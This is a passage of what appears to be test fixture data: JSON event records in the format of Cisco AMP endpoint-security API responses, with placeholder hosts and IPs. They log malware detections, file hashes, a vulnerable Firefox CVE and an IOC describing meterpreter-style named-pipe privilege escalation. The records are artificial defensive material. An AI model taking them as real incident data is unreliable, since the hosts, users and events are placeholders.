Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat 
